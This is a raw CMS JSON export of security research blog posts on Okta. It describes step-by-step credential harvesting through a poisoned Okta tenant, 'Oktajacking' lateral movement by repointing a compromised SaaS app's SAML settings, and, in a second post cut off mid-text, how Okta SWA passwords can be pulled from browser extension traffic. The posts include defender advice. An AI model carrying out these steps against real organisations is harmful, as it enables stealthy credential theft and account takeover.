create",{"data":58709,"content":58710,"nodeType":945},{},[58711],{"data":58712,"content":58713,"nodeType":860},{},[58714,58719],{"data":58715,"marks":58716,"value":58718,"nodeType":864},{},[58717],{"type":899},"Oktajacking for lateral movement ",{"data":58720,"marks":58721,"value":58722,"nodeType":864},{},[],"- capturing credentials via a watering hole attack when having admin-level compromised a SaaS application in use by the target organization",{"data":58724,"content":58727,"nodeType":996},{"target":58725},{"sys":58726},{"id":57916,"type":1001,"linkType":1002},[],{"data":58729,"content":58730,"nodeType":1009},{},[58731],{"data":58732,"marks":58733,"value":58703,"nodeType":864},{},[],{"data":58735,"content":58736,"nodeType":860},{},[58737,58741,58750],{"data":58738,"marks":58739,"value":58740,"nodeType":864},{},[],"The most common way someone might attack Okta-protected organizations would be to conduct traditional phishing attacks hosted on an attacker-controlled domain that emulate an Okta login page. A great article to check out on this would be Nick Vangilder’s article, ",{"data":58742,"content":58744,"nodeType":883},{"uri":58743},"https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23",[58745],{"data":58746,"marks":58747,"value":58749,"nodeType":864},{},[58748],{"type":1455},"Okta for Red Teamers - Perimeter Edition. ",{"data":58751,"marks":58752,"value":21,"nodeType":864},{},[],{"data":58754,"content":58755,"nodeType":860},{},[58756],{"data":58757,"marks":58758,"value":58759,"nodeType":864},{},[],"However, as with most phishing attacks this involves the use of a malicious domain to host the phishing server. Okta AD synchronization allows us to use legitimate Okta domains to do the phishing for us. This attack can catch out even the most security conscious users.",{"data":58761,"content":58762,"nodeType":860},{},[58763],{"data":58764,"marks":58765,"value":58766,"nodeType":864},{},[],"To do this, we set up an attacker-controlled Okta tenant as a poisoned tenant and configure it for AD integration, using Adam Chester’s python script to harvest credentials. This enables actual Okta-owned domains to be used in phishing attacks to target users. A careful attacker would likely use a tenant name similar to the target organization’s real Okta tenant name. This is incredibly powerful and is likely to be effective against even the most security conscious users. ",{"data":58768,"content":58769,"nodeType":860},{},[58770],{"data":58771,"marks":58772,"value":58773,"nodeType":864},{},[],"A few prerequisites and tweaks are required in order to make this attack successful:",{"data":58775,"content":58776,"nodeType":941},{},[58777,58787,58797],{"data":58778,"content":58779,"nodeType":945},{},[58780],{"data":58781,"content":58782,"nodeType":860},{},[58783],{"data":58784,"marks":58785,"value":58786,"nodeType":864},{},[],"Import and activate accounts from AD that match the emails of users you want to target - this will ensure these emails are mapped to AD for authentication and cause Okta to send the credentials to the monitoring script.",{"data":58788,"content":58789,"nodeType":945},{},[58790],{"data":58791,"content":58792,"nodeType":860},{},[58793],{"data":58794,"marks":58795,"value":58796,"nodeType":864},{},[],"Make a small modification to the python script to accept any password as valid, rather than a specific skeleton key. ",{"data":58798,"content":58799,"nodeType":945},{},[58800],{"data":58801,"content":58802,"nodeType":860},{},[58803],{"data":58804,"marks":58805,"value":58806,"nodeType":864},{},[],"Modify the default authentication policy for Okta to allow single-factor password authentication for the target users - this will prevent them being prompted to use Okta Verify as part of the login process.",{"data":58808,"content":58809,"nodeType":860},{},[58810],{"data":58811,"marks":58812,"value":58813,"nodeType":864},{},[],"The goal for the last two actions above is to allow target users to authenticate legitimately and then redirect them elsewhere, while capturing their credentials. This is better achieved by having their first password accepted rather than them continually failing to authenticate, which may eventually raise alarm bells. ",{"data":58815,"content":58816,"nodeType":860},{},[58817],{"data":58818,"marks":58819,"value":58820,"nodeType":864},{},[],"In this case, we’ll use Okta’s bug bounty system as a test for our poisoned tenant, but in practice an attacker could set up a legitimate Okta tenant, pay for it and name it whatever they like. ",{"data":58822,"content":58823,"nodeType":860},{},[58824],{"data":58825,"marks":58826,"value":58827,"nodeType":864},{},[],"The end result is a legitimate Okta domain and login page that will capture credentials for the attacker, which can then be used in highly convincing phishing attacks. In this example, the following URL will capture credentials for us:",{"data":58829,"content":58830,"nodeType":860},{},[58831,58834,58842],{"data":58832,"marks":58833,"value":21,"nodeType":864},{},[],{"data":58835,"content":58837,"nodeType":883},{"uri":58836},"https://bugcrowd-oie-lukejennings-1.oktapreview.com/",[58838],{"data":58839,"marks":58840,"value":58836,"nodeType":864},{},[58841],{"type":1455},{"data":58843,"marks":58844,"value":21,"nodeType":864},{},[],{"data":58846,"content":58850,"nodeType":996},{"target":58847},{"sys":58848},{"id":58849,"type":1001,"linkType":1002},"2KBgFSFnmIdKqfpp8sPGb1",[],{"data":58852,"content":58856,"nodeType":996},{"target":58853},{"sys":58854},{"id":58855,"type":1001,"linkType":1002},"5ef3me94SCAdM5vYXodqbF",[],{"data":58858,"content":58862,"nodeType":996},{"target":58859},{"sys":58860},{"id":58861,"type":1001,"linkType":1002},"3OFjwQRQTJynaPme8WY9cp",[],{"data":58864,"content":58865,"nodeType":1009},{},[58866],{"data":58867,"marks":58868,"value":58869,"nodeType":864},{},[],"Oktajacking for lateral movement",{"data":58871,"content":58872,"nodeType":860},{},[58873,58877,58887],{"data":58874,"marks":58875,"value":58876,"nodeType":864},{},[],"In both the previous section and our article on ",{"data":58878,"content":58882,"nodeType":57700},{"target":58879},{"sys":58880},{"id":58881,"type":1001,"linkType":1002},"3F96pyn4qqkbVctSOH69vm",[58883],{"data":58884,"marks":58885,"value":5272,"nodeType":864},{},[58886],{"type":1455},{"data":58888,"marks":58889,"value":58890,"nodeType":864},{},[],", we focused on conducting highly convincing phishing attacks by sending URLs for legitimate SaaS domains that capture credentials. ",{"data":58892,"content":58893,"nodeType":860},{},[58894],{"data":58895,"marks":58896,"value":58897,"nodeType":864},{},[],"But what if we achieve an admin-level compromise of a SaaS app used by a target organization that authenticates via Okta already? How can we leverage that access to perform lateral movement?",{"data":58899,"content":58900,"nodeType":860},{},[58901],{"data":58902,"marks":58903,"value":58904,"nodeType":864},{},[],"We can change the SAML configuration in the compromised SaaS application to point to a different Okta instance that we control and then conduct the same credential capture attack we saw in the previous section. ",{"data":58906,"content":58907,"nodeType":860},{},[58908],{"data":58909,"marks":58910,"value":58911,"nodeType":864},{},[],"In other words, we can then authenticate to the target SaaS application as any user we like and also capture Okta credentials for all legitimate users also using that application without needing to send any phishing links. ",{"data":58913,"content":58914,"nodeType":860},{},[58915],{"data":58916,"marks":58917,"value":58918,"nodeType":864},{},[],"We’re going to use Datadog as a demo example for this - just because we need something real to target. To be crystal clear, this will work for basically any app that supports SAML. This is not a bug in SAML, or in Okta, or Datadog - it's the consequence of having privileged administrative access to an app, and the ability to change SSO configuration.\n\nTo set up the attack, we need to first:",{"data":58920,"content":58921,"nodeType":941},{},[58922,58932,58942,58952,58962,58972],{"data":58923,"content":58924,"nodeType":945},{},[58925],{"data":58926,"content":58927,"nodeType":860},{},[58928],{"data":58929,"marks":58930,"value":58931,"nodeType":864},{},[],"Compromise the organization’s Datadog tenant at admin-level",{"data":58933,"content":58934,"nodeType":945},{},[58935],{"data":58936,"content":58937,"nodeType":860},{},[58938],{"data":58939,"marks":58940,"value":58941,"nodeType":864},{},[],"Create a malicious Okta tenant and connect it to an active directory instance with the same email domain as the target organization",{"data":58943,"content":58944,"nodeType":945},{},[58945],{"data":58946,"content":58947,"nodeType":860},{},[58948],{"data":58949,"marks":58950,"value":58951,"nodeType":864},{},[],"Create AD accounts for all users that will be targeted so they can be imported into Okta as AD account - in practice, it would be best to copy the list of users from Datadog and replicate this in AD and Okta",{"data":58953,"content":58954,"nodeType":945},{},[58955],{"data":58956,"content":58957,"nodeType":860},{},[58958],{"data":58959,"marks":58960,"value":58961,"nodeType":864},{},[],"Run Adam Chester’s python script to harvest credentials for Okta AD authentication and modify it to accept any password ",{"data":58963,"content":58964,"nodeType":945},{},[58965],{"data":58966,"content":58967,"nodeType":860},{},[58968],{"data":58969,"marks":58970,"value":58971,"nodeType":864},{},[],"Modify the Datadog SAML configuration to point to the malicious Okta tenant, instead of the original legitimate Okta tenant",{"data":58973,"content":58974,"nodeType":945},{},[58975],{"data":58976,"content":58977,"nodeType":860},{},[58978],{"data":58979,"marks":58980,"value":58981,"nodeType":864},{},[],"Sit back, relax, and watch the credentials coming in",{"data":58983,"content":58984,"nodeType":860},{},[58985],{"data":58986,"marks":58987,"value":58988,"nodeType":864},{},[],"Now we’ll explain what happens from the perspective of other users of the target organization’s Datadog tenant that has been compromised:",{"data":58990,"content":58991,"nodeType":941},{},[58992,59002,59012,59022],{"data":58993,"content":58994,"nodeType":945},{},[58995],{"data":58996,"content":58997,"nodeType":860},{},[58998],{"data":58999,"marks":59000,"value":59001,"nodeType":864},{},[],"Their Datadog session expires and they’re redirected back to the SAML login provider for re-authentication - in this case, to our malicious Okta tenant we have substituted for the real Okta tenant",{"data":59003,"content":59004,"nodeType":945},{},[59005],{"data":59006,"content":59007,"nodeType":860},{},[59008],{"data":59009,"marks":59010,"value":59011,"nodeType":864},{},[],"The user enters their credentials into the login page for our malicious Okta tenant. Our instance of Adam Chester’s AD synchronization script harvests the user’s login credentials.",{"data":59013,"content":59014,"nodeType":945},{},[59015],{"data":59016,"content":59017,"nodeType":860},{},[59018],{"data":59019,"marks":59020,"value":59021,"nodeType":864},{},[],"The user is already accustomed to using Okta to access Datadog, the Okta login page they are directed to is on a legitimate Okta domain and they haven’t clicked any links in emails/IM messages so there is no reason for suspicion.",{"data":59023,"content":59024,"nodeType":945},{},[59025],{"data":59026,"content":59027,"nodeType":860},{},[59028],{"data":59029,"marks":59030,"value":59031,"nodeType":864},{},[],"The modification we made to accept any credentials means the script returns true to Okta and causes Okta to accept the authentication attempt. This causes the user to be logged into the legitimate Datadog tenant again, where they can carry on their work, unaware they have just had their Okta credentials stolen.",{"data":59033,"content":59034,"nodeType":860},{},[59035],{"data":59036,"marks":59037,"value":59038,"nodeType":864},{},[],"The following video shows what a login attempt to Datadog looks like after the SAML configuration has been modified to point to our malicious Okta tenant. You can see how all the URLs observed are legitimate Datadog and Okta domains, any password will be accepted and harvested and the target user will be logged into the legitimate Datadog tenant successfully at the end.",{"data":59040,"content":59044,"nodeType":996},{"target":59041},{"sys":59042},{"id":59043,"type":1001,"linkType":1002},"dHVOdvHLdVzOEGai6qtSl",[],{"data":59046,"content":59047,"nodeType":860},{},[59048],{"data":59049,"marks":59050,"value":59051,"nodeType":864},{},[],"This type of attack sits somewhere in the middle of the kill chain between the initial access phishing we covered in the previous section and the full active directory/Okta domain compromise Adam Chester covered in his article. In this instance, we are looking at leveraging a more limited admin-level compromise of a single SaaS application to extend our access much further. ",{"data":59053,"content":59054,"nodeType":860},{},[59055,59059,59063],{"data":59056,"marks":59057,"value":59058,"nodeType":864},{},[],"When an organization relies on SaaS apps, it’s likely there may be some apps that are not considered particularly security critical and also may have “admins” that are actually just members of non-technical teams in the business. An admin-level compromise of ",{"data":59060,"marks":59061,"value":49445,"nodeType":864},{},[59062],{"type":2246},{"data":59064,"marks":59065,"value":59066,"nodeType":864},{},[]," SaaS application used by the organization can be used to conduct highly stealthy Okta credential capturing for all users. With those credentials, an attacker can expand their access and move laterally to other accounts and applications. ",{"data":59068,"content":59071,"nodeType":996},{"target":59069},{"sys":59070},{"id":58370,"type":1001,"linkType":1002},[],{"data":59073,"content":59074,"nodeType":1009},{},[59075],{"data":59076,"marks":59077,"value":58288,"nodeType":864},{},[],{"data":59079,"content":59080,"nodeType":860},{},[59081],{"data":59082,"marks":59083,"value":59084,"nodeType":864},{},[],"Let’s take a step back and consider the key points of impact here:",{"data":59086,"content":59087,"nodeType":941},{},[59088,59098,59108],{"data":59089,"content":59090,"nodeType":945},{},[59091],{"data":59092,"content":59093,"nodeType":860},{},[59094],{"data":59095,"marks":59096,"value":59097,"nodeType":864},{},[],"Attackers can send phishing links pointing to legitimate Okta domains and use those to capture credentials due to the way Okta AD synchronization works - this bypasses common user security training around checking domains are legitimate",{"data":59099,"content":59100,"nodeType":945},{},[59101],{"data":59102,"content":59103,"nodeType":860},{},[59104],{"data":59105,"marks":59106,"value":59107,"nodeType":864},{},[],"If an attacker compromises a legitimate SaaS tenant in use by an organization protected by Okta, they can modify the SAML configuration to point to their own malicious Okta tenant and thus capture credentials using the same method",{"data":59109,"content":59110,"nodeType":945},{},[59111],{"data":59112,"content":59113,"nodeType":860},{},[59114],{"data":59115,"marks":59116,"value":59117,"nodeType":864},{},[],"It would be extremely unlikely legitimate users would notice as it is part of the normal authentication flow, all domains observed would be legitimate SaaS and Okta domains, and they would be logged in successfully to the real SaaS tenant after entering their password",{"data":59119,"content":59120,"nodeType":1009},{},[59121],{"data":59122,"marks":59123,"value":24968,"nodeType":864},{},[],{"data":59125,"content":59126,"nodeType":860},{},[59127],{"data":59128,"marks":59129,"value":59130,"nodeType":864},{},[],"Okta is an identity management service that can help manage and protect access to a large number of applications used by an organization. However, due to the manner in which Okta AD synchronization works, it’s possible to use phishing links pointing to legitimate Okta domains to capture users credentials.",{"data":59132,"content":59133,"nodeType":860},{},[59134],{"data":59135,"marks":59136,"value":59137,"nodeType":864},{},[],"Additionally, admin access to any application in use with Okta needs to be carefully considered even if the application itself is not particularly sensitive. This is because a compromise of that application, or of a user account with admin access to it, can be used to modify the existing Okta SAML configuration to point to a malicious Okta tenant and conduct an extremely stealthy credential harvesting attack of all users of the application. ",{"data":59139,"content":59140,"nodeType":860},{},[59141],{"data":59142,"marks":59143,"value":59144,"nodeType":864},{},[],"Defenders should carefully monitor user access to Okta URLs that do not match their own legitimate tenant as it could be a sign of credential capturing attacks.",{"entries":59146},{"inline":59147,"hyperlink":59148,"block":59152},[],[59149],{"sys":59150,"__typename":2059,"title":5236,"slug":59151},{"id":58881},"samljacking-a-poisoned-tenant",[59153,59155,59163,59171,59179,59184],{"sys":59154,"__typename":1717,"type":58393,"ctaText":58394,"buttonLabel":58395,"buttonColour":1721,"buttonUrl":59},{"id":57916},{"sys":59156,"__typename":1724,"title":59157,"caption":59158,"layoutMode":59,"file":59159},{"id":58849},"Oktajacking 1","Importing AD users we have setup on our custom AD domain into Okta",{"url":59160,"width":59161,"height":59162},"https://images.ctfassets.net/y1cdw1ablpvd/1yuQgvV0YqJHHosLP4l1tq/12ceb07dc8b3a326bf43140e05d974a6/image1.png",1036,495,{"sys":59164,"__typename":1724,"title":59165,"caption":59166,"layoutMode":59,"file":59167},{"id":58855},"Oktajacking 2"," Modifying Okta authentication rules to only require a password (remove Okta Verify requirement",{"url":59168,"width":59169,"height":59170},"https://images.ctfassets.net/y1cdw1ablpvd/2qdJ0DT6gR4SIgVIm8uqKm/94eb5ea6d8af37800fa1aaf9ced6ba8b/image3.png",1082,476,{"sys":59172,"__typename":1724,"title":59173,"caption":59174,"layoutMode":59,"file":59175},{"id":58861},"Oktajacking 3","Running a modified version of Adam Chester’s python script to accept any password in addition to capturing credentials",{"url":59176,"width":59177,"height":59178},"https://images.ctfassets.net/y1cdw1ablpvd/36TIC04qvQQZ6tpo4B11go/85501dfc97a0eeb779e9011f1219d8a4/image2.png",1366,680,{"sys":59180,"__typename":1724,"title":59181,"caption":59,"layoutMode":59,"file":59182},{"id":59043},"Oktajacking demo webp",{"url":59183,"width":8977,"height":30057},"https://downloads.ctfassets.net/y1cdw1ablpvd/6YXk94C8bRO5OEnkwPIVWJ/e6a2f1799e8d7e342c247643f8eefdfc/oktajacking__3_.webp",{"sys":59185,"__typename":1717,"type":58474,"ctaText":58475,"buttonLabel":58476,"buttonColour":56131,"buttonUrl":59},{"id":58370},{"items":59187},[],{},"Making Okta do keylogging for you","2023-12-06T00:00:00.000Z",{"items":59192},[59193,60394,60860],{"__typename":2059,"sys":59194,"content":59196,"title":60380,"synopsis":60381,"hashTags":59,"publishedDate":60382,"slug":60383,"tagsCollection":60384,"authorsCollection":60390},{"id":59195},"1te7lpcknxuN73jdCdkXjd",{"json":59197},{"data":59198,"content":59199,"nodeType":856},{},[59200,59207,59214,59221,59228,59235,59242,59248,59255,59262,59269,59360,59365,59372,59379,59386,59419,59426,59433,59440,59447,59453,59460,59467,59490,59497,59503,59509,59516,59523,59530,59537,59544,59551,59558,59564,59570,59578,59585,59592,59599,59606,59613,59620,59627,59634,59641,59648,59655,59662,59667,59674,59681,59688,59695,59701,59707,59714,59721,59728,59751,59758,59764,59770,59777,59783,59790,59797,59808,59815,59822,59829,59836,59843,59861,59967,59974,59981,60029,60035,60042,60049,60056,60063,60070,60077,60083,60090,60109,60116,60123,60130,60137,60144,60151,60194,60201,60256,60262,60269,60332,60338,60345,60352,60359,60366,60373],{"data":59201,"content":59202,"nodeType":860},{},[59203],{"data":59204,"marks":59205,"value":59206,"nodeType":864},{},[],"This blog post covers the implications of using SWA as an authentication method in Okta, with a particular focus on what security teams need to consider in an account breach and subsequent incident response scenario. ",{"data":59208,"content":59209,"nodeType":860},{},[59210],{"data":59211,"marks":59212,"value":59213,"nodeType":864},{},[],"Spoiler alert: we’ll make the case that the true value of an SSO solution like Okta is in the use of SAML and OIDC authentication methods, not convenience features like SWA.",{"data":59215,"content":59216,"nodeType":1009},{},[59217],{"data":59218,"marks":59219,"value":59220,"nodeType":864},{},[],"Introduction",{"data":59222,"content":59223,"nodeType":860},{},[59224],{"data":59225,"marks":59226,"value":59227,"nodeType":864},{},[],"To facilitate SSO logins to web applications, Okta allows the industry standard SAML and OIDC protocols for federated logins to be used with applications that support it. These represent the most secure and recommended options. However, Okta also offers a proprietary system called SWA to support apps that don’t support these protocols, or where they are otherwise unavailable due to licensing restrictions.     ",{"data":59229,"content":59230,"nodeType":860},{},[59231],{"data":59232,"marks":59233,"value":59234,"nodeType":864},{},[],"While SWA is referred to as an SSO login mechanism, functionally it’s a password manager. SWA stores username and password combinations for individual applications on a per-user basis and makes use of a browser extension to automate the login process on behalf of the user. ",{"data":59236,"content":59237,"nodeType":860},{},[59238],{"data":59239,"marks":59240,"value":59241,"nodeType":864},{},[],"The screenshot below shows an example of an application being configured to use SWA as opposed to SAML, in this case Salesforce:",{"data":59243,"content":59247,"nodeType":996},{"target":59244},{"sys":59245},{"id":59246,"type":1001,"linkType":1002},"4wrRez2VpTG1vjsvNFlklK",[],{"data":59249,"content":59250,"nodeType":860},{},[59251],{"data":59252,"marks":59253,"value":59254,"nodeType":864},{},[],"From this configuration screen it’s not obvious that there is a fundamental difference between some login methods like SWA and true federated identity methods like SAML 2.0. To better understand the difference and the risks of SWA, let’s look at it from an attacker’s perspective.",{"data":59256,"content":59257,"nodeType":1009},{},[59258],{"data":59259,"marks":59260,"value":59261,"nodeType":864},{},[],"How are Okta accounts compromised?",{"data":59263,"content":59264,"nodeType":860},{},[59265],{"data":59266,"marks":59267,"value":59268,"nodeType":864},{},[],"While it’s common for Okta accounts to be protected using MFA, and sometimes device trust, there are still viable attack vectors. The two most prevalent attacks would be: ",{"data":59270,"content":59271,"nodeType":941},{},[59272,59287],{"data":59273,"content":59274,"nodeType":945},{},[59275],{"data":59276,"content":59277,"nodeType":860},{},[59278,59283],{"data":59279,"marks":59280,"value":59282,"nodeType":864},{},[59281],{"type":899},"Endpoint compromise",{"data":59284,"marks":59285,"value":59286,"nodeType":864},{},[]," - In a traditional endpoint compromise scenario, an attacker will generally have full access to the user’s browser. This means they can hijack existing Okta sessions by stealing authentication tokens, which bypass all device trust and MFA protections. For persistent access, they can keylog credentials when the user next logs in and add MFA methods or enrol a new endpoint with device trust.",{"data":59288,"content":59289,"nodeType":945},{},[59290],{"data":59291,"content":59292,"nodeType":860},{},[59293,59298,59302,59311,59314,59323,59327,59331,59340,59344,59348,59357],{"data":59294,"marks":59295,"value":59297,"nodeType":864},{},[59296],{"type":899},"Phishing attacks/MFA proxying",{"data":59299,"marks":59300,"value":59301,"nodeType":864},{},[]," - Traditional phishing attacks can be launched against Okta users to obtain credentials and/or authenticated sessions. Attacker-in-the-middle (AITM) attacks can be used to bypass common MFA mechanisms, and attacks against Okta users are typically carried out using tools such as ",{"data":59303,"content":59305,"nodeType":883},{"uri":59304},"https://github.com/kgretzky/evilginx2",[59306],{"data":59307,"marks":59308,"value":59310,"nodeType":864},{},[59309],{"type":1455},"evilginx",{"data":59312,"marks":59313,"value":3731,"nodeType":864},{},[],{"data":59315,"content":59317,"nodeType":883},{"uri":59316},"https://mrd0x.com/bypass-2fa-using-novnc/",[59318],{"data":59319,"marks":59320,"value":59322,"nodeType":864},{},[59321],{"type":1455},"noVNC",{"data":59324,"marks":59325,"value":1171,"nodeType":864},{},[59326],{"type":899},{"data":59328,"marks":59329,"value":59330,"nodeType":864},{},[],"or ",{"data":59332,"content":59334,"nodeType":883},{"uri":59333},"https://github.com/fkasler/cuddlephish",[59335],{"data":59336,"marks":59337,"value":59339,"nodeType":864},{},[59338],{"type":1455},"cuddlephish",{"data":59341,"marks":59342,"value":2924,"nodeType":864},{},[59343],{"type":899},{"data":59345,"marks":59346,"value":59347,"nodeType":864},{},[]," We’ve even seen groups using tooling specifically crafted to target Okta such as the notorious ",{"data":59349,"content":59351,"nodeType":883},{"uri":59350},"https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/",[59352],{"data":59353,"marks":59354,"value":59356,"nodeType":864},{},[59355],{"type":1455},"0ktapus group/campaign.",{"data":59358,"marks":59359,"value":21,"nodeType":864},{},[],{"data":59361,"content":59364,"nodeType":996},{"target":59362},{"sys":59363},{"id":57916,"type":1001,"linkType":1002},[],{"data":59366,"content":59367,"nodeType":1009},{},[59368],{"data":59369,"marks":59370,"value":59371,"nodeType":864},{},[],"What is Okta SWA?",{"data":59373,"content":59374,"nodeType":860},{},[59375],{"data":59376,"marks":59377,"value":59378,"nodeType":864},{},[],"Okta Secure Web Authentication (SWA) provides SSO-like functionality to web applications that don’t support federated protocols and is intended to be used only when SAML or OIDC federated logins cannot be used. ",{"data":59380,"content":59381,"nodeType":860},{},[59382],{"data":59383,"marks":59384,"value":59385,"nodeType":864},{},[],"It is SSO-like in the sense that:",{"data":59387,"content":59388,"nodeType":941},{},[59389,59399,59409],{"data":59390,"content":59391,"nodeType":945},{},[59392],{"data":59393,"content":59394,"nodeType":860},{},[59395],{"data":59396,"marks":59397,"value":59398,"nodeType":864},{},[],"A user enters their single Okta password to login to Okta, ",{"data":59400,"content":59401,"nodeType":945},{},[59402],{"data":59403,"content":59404,"nodeType":860},{},[59405],{"data":59406,"marks":59407,"value":59408,"nodeType":864},{},[],"SWA then stores username/password combinations ",{"data":59410,"content":59411,"nodeType":945},{},[59412],{"data":59413,"content":59414,"nodeType":860},{},[59415],{"data":59416,"marks":59417,"value":59418,"nodeType":864},{},[],"SWA then makes use of a browser extension to automatically login to applications using the credentials. ",{"data":59420,"content":59421,"nodeType":860},{},[59422],{"data":59423,"marks":59424,"value":59425,"nodeType":864},{},[],"In that sense, it’s essentially a password manager. Like any password manager, it can be a big security improvement over a user manually managing their accounts or reusing the same password everywhere.",{"data":59427,"content":59428,"nodeType":860},{},[59429],{"data":59430,"marks":59431,"value":59432,"nodeType":864},{},[],"There’s a good reason that true SSO is considered more secure than password managers, and this comes down to the identity. An SSO uses a single identity that is federated to other apps, where a password manager just better manages many discrete identities. So, when an employee leaves an organization and they’re using an SSO, a single identity needs to be disabled, but disabling access to a password manager does nothing to disable the identities inside it.",{"data":59434,"content":59435,"nodeType":860},{},[59436],{"data":59437,"marks":59438,"value":59439,"nodeType":864},{},[],"In the case of SWA, the use of a browser extension and a long list of supported applications with custom login scripts already written is a key value add. This means users don’t need to copy/paste credentials like they might with some password managers. ",{"data":59441,"content":59442,"nodeType":860},{},[59443],{"data":59444,"marks":59445,"value":59446,"nodeType":864},{},[],"However, unlike typical password managers, there isn’t just one type of SWA, administrators can actually pick between one of five configuration options. This is shown in the screenshot below:",{"data":59448,"content":59452,"nodeType":996},{"target":59449},{"sys":59450},{"id":59451,"type":1001,"linkType":1002},"42kt5hDFjjVYLf85HnjlU8",[],{"data":59454,"content":59455,"nodeType":860},{},[59456],{"data":59457,"marks":59458,"value":59459,"nodeType":864},{},[],"So, it’s possible to configure SWA like a traditional password manager scenario where the user sets their own username and password. However, as you can see above, you can set it up so that administrators can fully control the credentials, including the use of shared credentials used by multiple users.",{"data":59461,"content":59462,"nodeType":860},{},[59463],{"data":59464,"marks":59465,"value":59466,"nodeType":864},{},[],"SWA can also control the default configuration of the password reveal capability:",{"data":59468,"content":59469,"nodeType":941},{},[59470,59480],{"data":59471,"content":59472,"nodeType":945},{},[59473],{"data":59474,"content":59475,"nodeType":860},{},[59476],{"data":59477,"marks":59478,"value":59479,"nodeType":864},{},[],"When configured to allow users to set their own credentials, password reveal is enabled by default. ",{"data":59481,"content":59482,"nodeType":945},{},[59483],{"data":59484,"content":59485,"nodeType":860},{},[59486],{"data":59487,"marks":59488,"value":59489,"nodeType":864},{},[],"When administrators control the credentials, password reveal is disabled by default. ",{"data":59491,"content":59492,"nodeType":860},{},[59493],{"data":59494,"marks":59495,"value":59496,"nodeType":864},{},[],"Since Okta SWA performs logins automatically on behalf of the user, the user doesn’t technically need to be able to view or copy/paste the credentials. This makes it possible for Okta to support disabling password reveal. ",{"data":59498,"content":59502,"nodeType":996},{"target":59499},{"sys":59500},{"id":59501,"type":1001,"linkType":1002},"3IE8neYJbh0H8Vc7Hd9p5W",[],{"data":59504,"content":59508,"nodeType":996},{"target":59505},{"sys":59506},{"id":59507,"type":1001,"linkType":1002},"5C1lhoJtBEgdndiL9gSUbd",[],{"data":59510,"content":59511,"nodeType":1009},{},[59512],{"data":59513,"marks":59514,"value":59515,"nodeType":864},{},[],"What are the security risks of using SWA?",{"data":59517,"content":59518,"nodeType":860},{},[59519],{"data":59520,"marks":59521,"value":59522,"nodeType":864},{},[],"While SWA may be a step up from users performing manual logins to a range of apps, it carries the same risk that any password manager solution has. If your account is compromised then all your usernames and passwords can be stolen in one go.",{"data":59524,"content":59525,"nodeType":860},{},[59526],{"data":59527,"marks":59528,"value":59529,"nodeType":864},{},[],"But how can that be if password reveal has been disabled",{"data":59531,"content":59532,"nodeType":1312},{},[59533],{"data":59534,"marks":59535,"value":59536,"nodeType":864},{},[],"1. Bypassing password reveal restrictions",{"data":59538,"content":59539,"nodeType":860},{},[59540],{"data":59541,"marks":59542,"value":59543,"nodeType":864},{},[],"Even if users don’t directly interact with their passwords themselves (e.g. via copy/paste), their browser needs access otherwise it wouldn’t be possible to login to apps. ",{"data":59545,"content":59546,"nodeType":860},{},[59547],{"data":59548,"marks":59549,"value":59550,"nodeType":864},{},[],"The Okta browser extension uses the user’s active Okta login session to request credentials in the background, then automatically logs in to apps without the user ever directly seeing those credentials. So, while disabling password reveal may defeat a low-skill attacker or normal user scenarios, it’s essentially a client-side control, and isn’t going to stop a more determined attacker or technical user from getting at the credentials. This isn’t a bug, it’s a technical limitation of how a password manager works.",{"data":59552,"content":59553,"nodeType":860},{},[59554],{"data":59555,"marks":59556,"value":59557,"nodeType":864},{},[],"For example, let’s say a user has Salesforce configured as an app with SWA and clicks the app tile in the extension to login. The browser extension will use the active user session to make a request like the following (headers and irrelevant data removed for clarity):",{"data":59559,"content":59563,"nodeType":996},{"target":59560},{"sys":59561},{"id":59562,"type":1001,"linkType":1002},"2tiqg9EUoa9KxkTCduZoVe",[],{"data":59565,"content":59569,"nodeType":996},{"target":59566},{"sys":59567},{"id":59568,"type":1001,"linkType":1002},"4ApkgD7IwPRC3jC09Jf2SJ",[],{"data":59571,"content":59572,"nodeType":860},{},[59573],{"data":59574,"marks":59575,"value":59577,"nodeType":864},{},[59576],{"type":2246},"This response to the browser extension’s web request contains the username and password for Salesforce",{"data":59579,"content":59580,"nodeType":860},{},[59581],{"data":59582,"marks":59583,"value":59584,"nodeType":864},{},[],"This is the Salesforce-specific login script that allows the extension to automatically log the user in to Salesforce and includes their credentials. This request will include the credentials even if password reveal is disabled - the request above was captured using an intercepting proxy like Burp Suite.",{"data":59586,"content":59587,"nodeType":1312},{},[59588],{"data":59589,"marks":59590,"value":59591,"nodeType":864},{},[],"2. Cross-account shared passwords",{"data":59593,"content":59594,"nodeType":860},{},[59595],{"data":59596,"marks":59597,"value":59598,"nodeType":864},{},[],"An additional risk with SWA is an operational one. Administrators can set passwords for users and also disable password reveal, which can encourage the use of shared passwords, since they don’t expect the users to see them. ",{"data":59600,"content":59601,"nodeType":860},{},[59602],{"data":59603,"marks":59604,"value":59605,"nodeType":864},{},[],"If administrators are auto-generating complex passwords for every single user account they create as a strong operational process, then there may be no issue. However, breach history would tell us that rarely do organizations have operational security practices as stringent as that.",{"data":59607,"content":59608,"nodeType":860},{},[59609],{"data":59610,"marks":59611,"value":59612,"nodeType":864},{},[],"An attacker compromising an Okta user account can not only extract valid credentials for all configured SWA apps for that user, but may uncover passwords that are valid for other user accounts configured by administrators, making this a likely vector for lateral movement.",{"data":59614,"content":59615,"nodeType":1312},{},[59616],{"data":59617,"marks":59618,"value":59619,"nodeType":864},{},[],"3. Shared Okta passwords",{"data":59621,"content":59622,"nodeType":860},{},[59623],{"data":59624,"marks":59625,"value":59626,"nodeType":864},{},[],"One SWA option administrators can configure is to require the user to use their Okta password for the application (see earlier screenshot of configuration options). In this case, Okta lets the user set the password for the application, but it will confirm it matches the user’s Okta password and reject it otherwise.",{"data":59628,"content":59629,"nodeType":860},{},[59630],{"data":59631,"marks":59632,"value":59633,"nodeType":864},{},[],"This is a dangerous option, since it means the user’s Okta password is shared with other applications. So, if one of those applications is compromised, then their Okta password could be breached as well, which could allow both other applications and the user’s core Okta account to be compromised. It’s essentially enforcing password re-use, the exact opposite of what you want from an identity security perspective.",{"data":59635,"content":59636,"nodeType":1312},{},[59637],{"data":59638,"marks":59639,"value":59640,"nodeType":864},{},[],"4. Persistent access to connected apps",{"data":59642,"content":59643,"nodeType":860},{},[59644],{"data":59645,"marks":59646,"value":59647,"nodeType":864},{},[],"Okta acts as an authentication gateway for access to other applications. Ideally, strong authentication policies will be in place such as strong password policies, MFA, account lockout and detection and response 